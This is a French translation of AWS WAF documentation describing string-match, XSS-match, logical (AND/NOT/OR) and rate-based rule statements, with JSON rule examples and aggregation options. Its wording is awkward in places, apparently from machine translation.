Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

En outre, cette instruction nécessite les paramètres suivants : 
+ **Chaîne à correspondre** : il s'agit de la chaîne que vous AWS WAF souhaitez comparer au composant de demande spécifié. Généralement, la chaîne est composée de caractères ASCII affichables, mais vous pouvez spécifier n'importe quel caractère de valeur hexadécimale 0x00 à 0xFF (valeur décimale 0 à 255).
+ **Condition de correspondance des chaînes** : indique le type de recherche que vous AWS WAF souhaitez effectuer. 
  + **Correspond exactement à la chaîne** — La chaîne et la valeur du composant de requête sont identiques.
  + **Commence par une** chaîne — La chaîne apparaît au début du composant de demande. 
  + **Se termine par une chaîne** — La chaîne apparaît à la fin du composant de demande. 
  + **Contient une chaîne** — La chaîne apparaît n'importe où dans le composant de demande. 
  + **Contient un mot** : la chaîne que vous spécifiez doit apparaître dans le composant de demande. 

    Pour cette option, les chaînes que vous spécifiez doivent contenir uniquement des caractères alphanumériques ou un trait de soulignement (A-Z, a-z, 0-9 ou \$1). 

    L'un des éléments suivants doit être vrai pour que la demande corresponde : 
    + La chaîne correspond exactement à la valeur du composant de demande, telle que la valeur d'un en-tête.
    + La chaîne est au début du composant de demande et est suivie par un caractère autre qu'un caractère alphanumérique ou un soulignement (\$1) : par exemple, `BadBot;`.
    + La chaîne est à la fin du composant de demande et est suivie par un caractère autre qu'un caractère alphanumérique ou un soulignement (\$1) : par exemple, `;BadBot`.
    + La chaîne est au milieu du composant de demande et est précédée et suivie de caractères autre que des caractères alphanumériques ou de soulignement (\$1) : par exemple, `-BadBot;`.

## Où trouver cette déclaration de règle
<a name="string-match-where-to-find"></a>
+ **Générateur de règles** sur la console : pour le **type Match**, choisissez **String match condition**, puis renseignez les chaînes que vous souhaitez comparer.
+ **API** — [ByteMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_ByteMatchStatement.html)

# Instruction d'attaque par scripts inter-site de règle
<a name="waf-rule-statement-type-xss-match"></a>

Cette section explique ce qu'est une instruction d'attaque XSS (cross-site scripting) et comment elle fonctionne.

Une instruction d'attaque XSS détecte la présence de scripts malveillants dans un composant de requête Web. Lors d'une attaque XSS, l'attaquant utilise les vulnérabilités d'un site Web bénin pour injecter des scripts de site client malveillants dans d'autres navigateurs Web légitimes. 

## Caractéristiques de l'énoncé des règles
<a name="xss-match-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— 40 WCUs, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

## Où trouver cette déclaration de règle
<a name="xss-match-where-to-find"></a>
+ **Générateur de règles** sur console : pour le **type de match**, choisissez **Condition de match d'attaque** > **Contient des attaques par injection XSS**.
+ **API** — [XssMatchStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_XssMatchStatement.html)

# Utilisation d'instructions de règles logiques dans AWS WAF
<a name="waf-rule-statements-logical"></a>

Cette section explique ce qu'est une déclaration de règle logique et comment elle fonctionne.

Utilisez des instructions de règles logiques pour combiner d'autres instructions ou annuler leurs résultats. Chaque instruction de règle logique prend au moins une instruction imbriquée.

Pour combiner ou annuler de manière logique les résultats des instructions de règle, vous imbriquez les instructions sous des instructions de règles logiques. 

Les déclarations de règles logiques sont imbriquables. Vous pouvez les imbriquer dans d'autres instructions de règles logiques et les utiliser dans des instructions de portée réduite. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

**Note**  
L'éditeur visuel de la console prend en charge un niveau d'imbrication des instructions de règle, ce qui fonctionne pour de nombreux besoins. Pour imbriquer davantage de niveaux, modifiez la représentation JSON de la règle sur la console ou utilisez le APIs. 

Ce tableau décrit les instructions de règles logiques et fournit des directives pour calculer l'utilisation des unités de capacité (WCU) du pack de protection (ACL Web) pour chacune d'elles. Pour plus d'informations sur WCUs, voir[Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md). 


| Instruction logique  | Description | WCUs | 
| --- | --- | --- | 
| [Logique AND](waf-rule-statement-type-and.md) | Combine des instructions imbriquées avec la AND logique. | Basé sur des instructions imbriquées | 
|  [Logique NOT](waf-rule-statement-type-not.md)  |  Annule les résultats d'une instruction imbriquée.  |  Basé sur une instruction imbriquée  | 
| [Logique OR](waf-rule-statement-type-or.md) | Combine des instructions imbriquées avec la OR logique. | Basé sur des instructions imbriquées | 

# ANDdéclaration de règle
<a name="waf-rule-statement-type-and"></a>

L'instruction de AND règle combine des instructions imbriquées avec une AND opération logique, de sorte que toutes les instructions imbriquées doivent correspondre pour que l'ANDinstruction corresponde. Cela nécessite au moins deux instructions imbriquées. 

## Caractéristiques de l'énoncé des règles
<a name="and-rule-statement-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— Cela dépend des instructions imbriquées.

## Où trouver cette déclaration de règle
<a name="and-rule-statement-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Si une demande**, choisissez **correspond à toutes les instructions (ET)**, puis complétez les instructions imbriquées. 
+ **API** — [AndStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_AndStatement.html)

## Exemples
<a name="and-rule-statement-examples"></a>

La liste suivante montre l'utilisation d'instructions AND de règles NOT logiques pour éliminer les faux positifs des correspondances pour une instruction d'attaque par injection SQL. Pour cet exemple, supposons que nous puissions écrire une instruction de correspondance d'un octet pour répondre aux demandes qui génèrent des faux positifs. 

L'instruction AND correspond aux demandes qui ne correspondent pas à l'instruction de correspondance d'octets et qui correspondent à l'instruction d'attaque par injection SQL. 

```
{
      "Name": "SQLiExcludeFalsePositives",
      "Priority": 0,
      "Statement": {
        "AndStatement": {
          "Statements": [
            {
              "NotStatement": {
                "Statement": {
                  "ByteMatchStatement": {
                    "SearchString": "string identifying a false positive",
                    "FieldToMatch": {
                      "Body": {
                        "OversizeHandling": "MATCH"
                      }
                    },
                    "TextTransformations": [
                      {
                        "Priority": 0,
                        "Type": "NONE"
                      }
                    ],
                    "PositionalConstraint": "CONTAINS"
                  }
                }
              }
            },
            {
              "SqliMatchStatement": {
                "FieldToMatch": {
                  "Body": {
                    "OversizeHandling": "MATCH"
                  }
                },
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                  }
                ]
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "SQLiExcludeFalsePositives"
      }
    }
```

À l'aide de l'éditeur visuel de règles de console, vous pouvez imbriquer une instruction non logique ou une NOT instruction sous une AND instruction OR or. L'imbrication de l'NOTinstruction est illustrée dans l'exemple précédent. 

À l'aide de l'éditeur visuel de règles de console, vous pouvez imbriquer la plupart des instructions imbriquables dans une instruction de règle logique, telle que celle illustrée dans l'exemple précédent. Vous ne pouvez pas utiliser l'éditeur visuel pour imbriquer OR des AND instructions. Pour configurer ce type d'imbrication, vous devez fournir votre déclaration de règle au format JSON. Par exemple, la liste de règles JSON suivante inclut une OR instruction imbriquée dans une AND instruction. 

```
{
  "Name": "match_rule",
  "Priority": 0,
  "Statement": {
    "AndStatement": {
      "Statements": [
        {
          "LabelMatchStatement": {
            "Scope": "LABEL",
            "Key": "awswaf:managed:aws:bot-control:bot:category:monitoring"
          }
        },
        {
          "NotStatement": {
            "Statement": {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:managed:aws:bot-control:bot:name:pingdom"
              }
            }
          }
        },
        {
          "OrStatement": {
            "Statements": [
              {
                "GeoMatchStatement": {
                  "CountryCodes": [
                    "JM",
                    "JP"
                  ]
                }
              },
              {
                "ByteMatchStatement": {
                  "SearchString": "JCountryString",
                  "FieldToMatch": {
                    "Body": {}
                  },
                  "TextTransformations": [
                    {
                      "Priority": 0,
                      "Type": "NONE"
                    }
                  ],
                  "PositionalConstraint": "CONTAINS"
                }
              }
            ]
          }
        }
      ]
    }
  },
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "match_rule"
  }
}
```

# NOTdéclaration de règle
<a name="waf-rule-statement-type-not"></a>

L'instruction de NOT règle annule logiquement les résultats d'une seule instruction imbriquée, de sorte que les instructions imbriquées ne doivent pas correspondre pour que l'NOTinstruction corresponde, et vice versa. Cela nécessite une instruction imbriquée. 

Par exemple, si vous souhaitez bloquer les demandes qui ne proviennent pas d'un pays spécifique, créez une NOT déclaration dont l'action est définie pour bloquer et imbriquez une déclaration de correspondance géographique spécifiant le pays. 

## Caractéristiques de l'énoncé des règles
<a name="not-rule-statement-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— Cela dépend de l'instruction imbriquée.

## Où trouver cette déclaration de règle
<a name="not-rule-statement-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Si une demande**, choisissez **ne correspond pas à l'instruction (NOT)**, puis renseignez l'instruction imbriquée.
+ **API** — [NotStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_NotStatement.html)

# ORdéclaration de règle
<a name="waf-rule-statement-type-or"></a>

L'instruction de OR règle combine des instructions imbriquées avec de OR la logique, de sorte que l'une des instructions imbriquées doit correspondre pour que l'ORinstruction corresponde. Cela nécessite au moins deux instructions imbriquées. 

Par exemple, si vous souhaitez bloquer les demandes provenant d'un pays spécifique ou contenant une chaîne de requête spécifique, vous pouvez créer une OR instruction et y imbriquer une instruction de correspondance géographique pour le pays et une instruction de correspondance de chaîne pour la chaîne de requête. 

Si vous souhaitez plutôt bloquer les demandes qui *ne proviennent pas* d'un pays spécifique ou qui contiennent une chaîne de requête spécifique, vous devez modifier l'ORinstruction précédente pour imbriquer l'instruction de correspondance géographique un niveau plus bas, à l'intérieur d'une NOT instruction. Ce niveau d'imbrication nécessite que vous utilisiez le format JSON, car la console ne prend en charge qu'un seul niveau d'imbrication.

## Caractéristiques de l'énoncé des règles
<a name="or-rule-statement-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs**— Cela dépend des instructions imbriquées.

## Où trouver cette déclaration de règle
<a name="or-rule-statement-where-to-find"></a>
+ **Générateur de règles** sur la console : pour **Si une demande**, choisissez **correspond à au moins une des instructions (OR)**, puis renseignez les instructions imbriquées. 
+ **API** — [OrStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_OrStatement.html)

**Exemples**  
La liste suivante montre l'utilisation de OR pour combiner deux autres instructions. L'ORinstruction correspond si l'une des instructions imbriquées correspond. 

```
{
  "Name": "neitherOfTwo",
  "Priority": 1,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "neitherOfTwo"
  },
  "Statement": {
    "OrStatement": {
      "Statements": [
        {
          "GeoMatchStatement": {
            "CountryCodes": [
              "CA"
            ]
          }
        },
        {
          "IPSetReferenceStatement": {
            "ARN": "arn:aws:wafv2:us-east-1:111111111111:regional/ipset/test-ip-set-22222222/33333333-4444-5555-6666-777777777777"
          }
        }
      ]
    }
  }
}
```

À l'aide de l'éditeur visuel de règles de console, vous pouvez imbriquer la plupart des instructions imbriquables dans une instruction de règle logique, mais vous ne pouvez pas utiliser l'éditeur visuel pour imbriquer OR des AND instructions. Pour configurer ce type d'imbrication, vous devez fournir votre déclaration de règle au format JSON. Par exemple, la liste de règles JSON suivante inclut une OR instruction imbriquée dans une AND instruction. 

```
{
  "Name": "match_rule",
  "Priority": 0,
  "Statement": {
    "AndStatement": {
      "Statements": [
        {
          "LabelMatchStatement": {
            "Scope": "LABEL",
            "Key": "awswaf:managed:aws:bot-control:bot:category:monitoring"
          }
        },
        {
          "NotStatement": {
            "Statement": {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:managed:aws:bot-control:bot:name:pingdom"
              }
            }
          }
        },
        {
          "OrStatement": {
            "Statements": [
              {
                "GeoMatchStatement": {
                  "CountryCodes": [
                    "JM",
                    "JP"
                  ]
                }
              },
              {
                "ByteMatchStatement": {
                  "SearchString": "JCountryString",
                  "FieldToMatch": {
                    "Body": {}
                  },
                  "TextTransformations": [
                    {
                      "Priority": 0,
                      "Type": "NONE"
                    }
                  ],
                  "PositionalConstraint": "CONTAINS"
                }
              }
            ]
          }
        }
      ]
    }
  },
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "match_rule"
  }
}
```

# Utilisation d'instructions de règles basées sur le taux dans AWS WAF
<a name="waf-rule-statement-type-rate-based"></a>

Cette section explique ce qu'est une déclaration de règle basée sur le taux et comment elle fonctionne.

Une règle basée sur le taux compte les demandes entrantes et limite le débit des demandes lorsqu'elles arrivent trop rapidement. La règle agrège les demandes en fonction de vos critères, et compte et limite le taux des groupements agrégés, en fonction de la fenêtre d'évaluation, de la limite de demandes et des paramètres d'action de la règle. 

**Note**  
Vous pouvez également limiter le débit des requêtes Web en utilisant le niveau de protection ciblé du groupe de règles AWS gérées par Bot Control. L'utilisation de ce groupe de règles géré entraîne des frais supplémentaires. Pour de plus amples informations, veuillez consulter [Options de limitation du débit dans les règles basées sur les taux et dans les règles de contrôle des bots ciblées](waf-rate-limiting-options.md). 

AWS WAF suit et gère les requêtes Web séparément pour chaque instance d'une règle basée sur le taux que vous utilisez. Par exemple, si vous fournissez les mêmes paramètres de règle basés sur le taux sur deux sites WebACLs, chacune des deux instructions de règle représente une instance distincte de la règle basée sur le taux et chacune bénéficie de son propre suivi et de sa propre gestion par. AWS WAF Si vous définissez une règle basée sur les taux au sein d'un groupe de règles, puis que vous utilisez ce groupe de règles à plusieurs endroits, chaque utilisation crée une instance distincte de la règle basée sur les taux qui fait l'objet de son propre suivi et de sa propre gestion. AWS WAF

**Non imbriquable** : vous ne pouvez pas imbriquer ce type d'instruction dans d'autres instructions. Vous pouvez l'inclure directement dans un pack de protection (ACL Web) ou un groupe de règles. 

Instruction de **portée réduite** : ce type de règle peut adopter une instruction de portée réduite, afin de réduire la portée des demandes suivies par la règle et les limites de débit. L'instruction scope-down peut être facultative ou obligatoire, en fonction de vos autres paramètres de configuration des règles. Les détails sont présentés dans cette section. Pour des informations générales sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md) 

**WCUs**— 2, comme coût de base. Pour chaque clé d'agrégation personnalisée que vous spécifiez, ajoutez 30 WCUs. Si vous utilisez une instruction scope-down dans la règle, calculez et ajoutez l' WCUs instruction correspondante.

**Où trouver cette déclaration de règle**
+ **Générateur de règles** dans votre pack de protection (ACL Web), sur la console : sous **Règle**, pour **Type**, choisissez **Règle basée sur le taux**.
+ **API** — [RateBasedStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_RateBasedStatement.html)

**Topics**
+ [Paramètres de haut niveau des règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based-high-level-settings.md)
+ [Mises en garde relatives aux règles basées sur les taux dans AWS WAF](waf-rule-statement-type-rate-based-caveats.md)
+ [Agrégation des règles basées sur les taux dans AWS WAF](waf-rule-statement-type-rate-based-aggregation-options.md)
+ [Instances et nombres d'agrégation de règles basés sur le taux](waf-rule-statement-type-rate-based-aggregation-instances.md)
+ [Appliquer une limite de débit aux demandes en AWS WAF](waf-rule-statement-type-rate-based-request-limiting.md)
+ [Exemples de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based-examples.md)
+ [Répertorier les adresses IP dont le débit est limité par des règles basées sur le débit](listing-managed-ips.md)

# Paramètres de haut niveau des règles basées sur le taux dans AWS WAF
<a name="waf-rule-statement-type-rate-based-high-level-settings"></a>

Une instruction de règle basée sur le taux utilise les paramètres de haut niveau suivants : 
+ **Fenêtre d'évaluation** : durée, en secondes, à AWS WAF inclure dans le nombre de demandes, si l'on considère l'heure actuelle. Par exemple, pour un paramètre de 120, lorsque AWS WAF le taux est vérifié, il compte les demandes pendant les 2 minutes précédant immédiatement l'heure actuelle. Les paramètres valides sont 60 (1 minute), 120 (2 minutes), 300 (5 minutes) et 600 (10 minutes), et 300 (5 minutes) est la valeur par défaut. 

  Ce paramètre ne détermine pas la fréquence AWS WAF à laquelle le taux est vérifié, mais la distance parcourue à chaque vérification. AWS WAF vérifie le taux fréquemment, avec un calendrier indépendant du réglage de la fenêtre d'évaluation. 
+ **Limite de taux** : nombre maximum de demandes correspondant à vos critères qui AWS WAF doivent être suivies pendant la période d'évaluation spécifiée. La limite minimale autorisée est 10. Lorsque cette limite est dépassée, AWS WAF applique le paramètre d'action de la règle aux demandes supplémentaires correspondant à vos critères. 

  AWS WAF applique une limite de débit proche de la limite que vous avez définie, mais ne garantit pas une correspondance exacte entre les limites. Pour de plus amples informations, veuillez consulter [Mises en garde relatives aux règles basées sur les taux](waf-rule-statement-type-rate-based-caveats.md). 
+ **Agrégation des demandes** : les critères d'agrégation à utiliser sur le Web demandent que la règle basée sur le taux compte et limite le débit. La limite de débit que vous définissez s'applique à chaque instance d'agrégation. Pour plus d’informations, consultez [Agrégation des règles basées sur les taux](waf-rule-statement-type-rate-based-aggregation-options.md) et [Instances d'agrégation et nombres](waf-rule-statement-type-rate-based-aggregation-instances.md). 
+ **Action : action** à effectuer en réponse aux demandes dont le taux est limité par la règle. Vous pouvez utiliser n'importe quelle action de règle, saufAllow. Ceci est défini au niveau de la règle, comme d'habitude, mais comporte certaines restrictions et certains comportements spécifiques aux règles basées sur les taux. Pour des informations générales sur les actions relatives aux règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). Pour des informations spécifiques à la limitation du débit, consultez [Appliquer une limite de débit aux demandes en AWS WAF](waf-rule-statement-type-rate-based-request-limiting.md) cette section.
+ **Étendue de l'inspection et limitation du débit** : vous pouvez réduire la portée des demandes suivies par le relevé basé sur les taux et les limites de taux en ajoutant un relevé de portée inférieure. Si vous spécifiez une instruction scope-down, la règle agrège, compte et limite le débit uniquement les demandes qui correspondent à l'instruction scope-down. Si vous choisissez l'option d'agrégation des demandes **Count all**, l'instruction scope-down est requise. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions de portée réduite](waf-rule-scope-down-statements.md) 
+ **(Facultatif) Configuration IP transférée** : elle n'est utilisée que si vous spécifiez l'**adresse IP dans l'en-tête** de votre agrégation de demandes, soit seule, soit dans le cadre des paramètres de clés personnalisés. AWS WAF récupère la première adresse IP dans l'en-tête spécifié et l'utilise comme valeur d'agrégation. Un en-tête courant est utilisé à cette fin`X-Forwarded-For`, mais vous pouvez spécifier n'importe quel en-tête. Pour de plus amples informations, veuillez consulter [Utilisation d'adresses IP transférées](waf-rule-statement-forwarded-ip-address.md). 

# Mises en garde relatives aux règles basées sur les taux dans AWS WAF
<a name="waf-rule-statement-type-rate-based-caveats"></a>

Cette section répertorie les mises en garde relatives à l'utilisation de règles basées sur les taux.

AWS WAF la limitation du débit est conçue pour contrôler les taux de demandes élevés et protéger la disponibilité de votre application de la manière la plus efficace possible. Il n'est pas destiné à une limitation précise du taux de demandes. 
+ AWS WAF estime le taux de demandes actuel à l'aide d'un algorithme qui accorde plus d'importance aux demandes les plus récentes. Pour cette raison, AWS WAF appliquera une limite de taux proche de la limite que vous avez définie, mais cela ne garantit pas une correspondance exacte entre les limites. 
+ Chaque fois que le taux de demandes est AWS WAF estimé, AWS WAF il revient sur le nombre de demandes reçues pendant la fenêtre d'évaluation configurée. En raison de cela et d'autres facteurs tels que les délais de propagation, il est possible que les demandes arrivent à un rythme trop élevé pendant plusieurs minutes avant de les AWS WAF détecter et de les limiter. De même, le taux de demandes peut être inférieur à la limite pendant un certain temps avant de AWS WAF détecter la diminution et d'interrompre l'action de limitation du débit. Ce délai est généralement inférieur à 30 secondes.
+ Si vous modifiez l'un des paramètres de limite de débit d'une règle en cours d'utilisation, la modification réinitialise le nombre de limites de débit de la règle. Cela peut suspendre les activités de limitation de débit prévues par la règle pendant une minute au maximum. Les paramètres de limite de débit sont la fenêtre d'évaluation, la limite de débit, les paramètres d'agrégation des demandes, la configuration IP transférée et l'étendue de l'inspection. 

# Agrégation des règles basées sur les taux dans AWS WAF
<a name="waf-rule-statement-type-rate-based-aggregation-options"></a>

Cette section explique les options qui s'offrent à vous pour agréger les demandes.

Par défaut, une règle basée sur le débit agrège et limite les demandes en fonction de l'adresse IP de la demande. Vous pouvez configurer la règle pour utiliser diverses autres clés d'agrégation et combinaisons de touches. Par exemple, vous pouvez agréger en fonction d'une adresse IP transférée, de la méthode HTTP ou d'un argument de requête. Vous pouvez également spécifier des combinaisons de clés d'agrégation, telles que l'adresse IP et la méthode HTTP, ou les valeurs de deux cookies différents. 

**Note**  
Tous les composants de demande que vous spécifiez dans la clé d'agrégation doivent être présents dans une requête Web pour que la demande soit évaluée ou que le taux soit limité par la règle. 

Vous pouvez configurer votre règle basée sur le taux avec les options d'agrégation suivantes. 
+ **Adresse IP source** : agrégée en utilisant uniquement l'adresse IP de l'origine de la requête Web. 

  L'adresse IP source peut ne pas contenir l'adresse du client d'origine. Si une requête Web passe par un ou plusieurs proxys ou équilibreurs de charge, celle-ci contiendra l'adresse du dernier proxy. 
+ **Adresse IP dans l'en-tête** : agrégation en utilisant uniquement une adresse client dans un en-tête HTTP. Cette adresse est également appelée adresse IP transférée. 

  Avec cette configuration, vous spécifiez également un comportement de secours à appliquer à une requête Web dont l'en-tête contient une adresse IP mal formée. Le comportement de remplacement définit le résultat correspondant à la demande, qu'il corresponde ou non. En cas d'absence de correspondance, la règle basée sur le taux ne compte pas ou ne limite pas le taux de la demande. Pour la correspondance, la règle basée sur le taux regroupe la demande avec les autres demandes dont l'adresse IP est mal formée dans l'en-tête spécifié. 

  Soyez prudent avec cette option, car les en-têtes peuvent être gérés de manière incohérente par les proxys et ils peuvent également être modifiés pour contourner l'inspection. Pour plus d'informations et les meilleures pratiques, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md).
+ **ASN** — Agrégation à l'aide d'un numéro de système autonome (ASN) associé à l'adresse IP source en tant que clé agrégée. Il ne s'agit peut-être pas de l'adresse du client d'origine. Si une requête Web passe par un ou plusieurs proxys ou équilibreurs de charge, celle-ci contient l'adresse du dernier proxy. 

  S'il n'est pas AWS WAF possible de dériver un ASN à partir de l'adresse IP, il compte l'ASN comme un ASN 0. Si vous ne souhaitez pas appliquer de limitation de débit aux applications non mappées ASNs, vous pouvez créer une règle de délimitation qui exclut les demandes dont l'ASN est 0.
+ **ASN dans l'en-tête** : agrégation à l'aide d'un ASN associé à l'adresse IP d'un client dans un en-tête HTTP. Cette adresse est également appelée adresse IP transférée. Avec cette configuration, vous spécifiez également un comportement de secours à appliquer à une requête Web dont l'adresse IP n'est pas valide ou est mal formée. Le comportement de remplacement définit le résultat correspondant à la demande, qu'il corresponde ou non. Si vous définissez le comportement de secours pour qu'il corresponde à la configuration IP transférée, AWS WAF traite l'adresse IP non valide comme une valeur correspondante. Cela permet AWS WAF de continuer à évaluer les parties restantes de la clé composite de votre règle basée sur les taux. En cas d'absence de correspondance, la règle basée sur le taux ne compte pas ou ne limite pas le taux de la demande. 

  Soyez prudent avec cette option, car les en-têtes peuvent être gérés de manière incohérente par les proxys et ils peuvent être modifiés pour contourner l'inspection. Pour plus d'informations et les meilleures pratiques, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md).
+ **Tout compter** : comptez et limitez le débit de toutes les demandes qui correspondent à l'énoncé de portée réduite de la règle. Cette option nécessite une instruction scope-down. Ceci est généralement utilisé pour limiter le débit d'un ensemble spécifique de demandes, telles que toutes les demandes portant une étiquette spécifique ou toutes les demandes provenant d'une zone géographique spécifique. 
+ **Clés personnalisées** : agrégation à l'aide d'une ou de plusieurs clés d'agrégation personnalisées. Pour combiner l'une des options d'adresse IP avec d'autres clés d'agrégation, définissez-les ici sous Clés personnalisées. 

  Les clés d'agrégation personnalisées sont un sous-ensemble des options des composants de demande Web décrites sur[Demandez des composants dans AWS WAF](waf-rule-statement-fields-list.md).

  Les principales options sont les suivantes. Sauf indication contraire, vous pouvez utiliser une option plusieurs fois, par exemple deux en-têtes ou trois espaces de noms d'étiquettes.
  + **Espace de noms d'étiquettes** : utilisez un espace de noms d'étiquettes comme clé d'agrégation. Chaque nom d'étiquette complet distinct qui possède l'espace de noms d'étiquette spécifié contribue à l'instance d'agrégation. Si vous utilisez un seul espace de noms d'étiquette comme clé personnalisée, chaque nom d'étiquette définit entièrement une instance d'agrégation.

    La règle basée sur le taux utilise uniquement les étiquettes qui ont été ajoutées à la demande par des règles préalablement évaluées dans le pack de protection (ACL Web).

    Pour plus d'informations sur les espaces de noms et les noms d'étiquettes, consultez[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md).
  + **En-tête** : utilisez un en-tête nommé comme clé d'agrégation. Chaque valeur distincte de l'en-tête contribue à l'instance d'agrégation. 

    L'en-tête nécessite une transformation de texte facultative. Consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md). 
  + **Cookie** : utilisez un cookie nommé comme clé d'agrégation. Chaque valeur distincte du cookie contribue à l'instance d'agrégation. 

    Le cookie effectue une transformation de texte facultative. Consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md). 
  + **Argument de requête** : utilisez un seul argument de requête dans la demande comme clé d'agrégation. Chaque valeur distincte pour l'argument de requête nommé contribue à l'instance d'agrégation. 

    L'argument Query accepte une transformation de texte facultative. Consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md). 
  + **Chaîne de requête** : utilisez l'intégralité de la chaîne de requête de la demande comme clé agrégée. Chaque chaîne de requête distincte contribue à l'instance d'agrégation. Vous ne pouvez utiliser ce type de clé qu'une seule fois. 

    La chaîne de requête accepte une transformation de texte facultative. Consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md). 
  + **Chemin de l'URI** — Utilisez le chemin de l'URI dans la demande comme clé agrégée. Chaque chemin d'URI distinct contribue à l'instance d'agrégation. Vous ne pouvez utiliser ce type de clé qu'une seule fois. 

    Le chemin de l'URI effectue une transformation de texte facultative. Consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md). 
  + **JA3 empreinte digitale** — Utilisez l' JA3 empreinte digitale de la demande comme clé agrégée. Chaque JA3 empreinte digitale distincte contribue à l'instance d'agrégation. Vous ne pouvez utiliser ce type de clé qu'une seule fois. 
  + **JA4 empreinte digitale** — Utilisez l' JA4 empreinte digitale de la demande comme clé agrégée. Chaque JA4 empreinte digitale distincte contribue à l'instance d'agrégation. Vous ne pouvez utiliser ce type de clé qu'une seule fois. 
  + **Méthode HTTP** : utilisez la méthode HTTP de la demande comme clé d'agrégation. Chaque méthode HTTP distincte contribue à l'instance d'agrégation. Vous ne pouvez utiliser ce type de clé qu'une seule fois. 
  + **Adresse IP** : agrégation à l'aide de l'adresse IP provenant de l'origine de la demande Web en combinaison avec d'autres clés.

    Il se peut qu'il ne contienne pas l'adresse du client d'origine. Si une requête Web passe par un ou plusieurs proxys ou équilibreurs de charge, celle-ci contiendra l'adresse du dernier proxy. 
